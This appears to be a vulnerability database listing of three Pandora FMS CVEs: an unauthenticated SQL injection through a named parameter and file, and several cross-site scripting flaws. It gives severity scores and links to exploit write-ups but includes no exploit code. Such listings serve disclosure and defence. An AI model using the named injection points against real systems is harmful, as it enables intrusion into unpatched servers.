CVSS: 9.8EPSS: 0%CPEs: 1EXPL: 1CVE-2020-26518
https://notcve.org/view.php?id=CVE-2020-26518
Artica Pandora FMS before 743 allows unauthenticated attackers to conduct SQL injection attacks via the pandora_console/include/chart_generator.php session_id parameter. Artica Pandora FMS versiones anteriores a 743, permite a atacantes no autenticados conducir ataques de inyección SQL por medio del parámetro session_id del archivo pandora_console/include/chart_generator.php • https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 9.0EPSS: 4%CPEs: 1EXPL: 2CVE-2020-11749 – PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2020-11749
Pandora FMS 7.0 NG <= 746 suffers from Multiple XSS vulnerabilities in different browser views. A network administrator scanning a SNMP device can trigger a Cross Site Scripting (XSS), which can run arbitrary code to allow Remote Code Execution as root or apache2. Pandora FMS versiones 7.0 NG anteriores a 746 incluyéndola, sufre de múltiples vulnerabilidades de tipo XSS en diferentes vistas del navegador. Un administrador de red que escanea un dispositivo SNMP puede desencadenar un ataque de tipo Cross Site Scripting (XSS), que puede ejecutar código arbitrario para permitir una ejecución de código remota como root o apache2 • https://www.exploit-db.com/exploits/48707 https://medium.com/%40tehwinsam/multiple-xss-on-pandorafms-7-0-ng-744-64b244b8523c https://packetstormsecurity.com/files/158389/Pandora-FMS-7.0-NG-746-Script-Insertion-Code-Execution.htmlPoC https://pandorafms.com/downloads/whats-new-747-EN.pdf • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 5.4EPSS: 0%CPEs: 1EXPL: 1CVE-2019-19968
https://notcve.org/view.php?id=CVE-2019-19968
PandoraFMS 742 suffers from multiple XSS vulnerabilities, affecting the Agent Management, Report Builder, and Graph Builder components. An authenticated user can inject dangerous content into a data store that is later read and included in dynamic content. PandoraFMS versión 742, sufre de múltiples vulnerabilidades de tipo XSS, afectando a los componentes Agent Management, Report Builder, y Graph Builder. Un usuario autenticado puede inyectar contenido peligroso en un almacén de datos que luego es leído e incluido en un contenido dinámico. • https://k4m1ll0.com/cve-2019-19968.html https://pandorafms.com • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •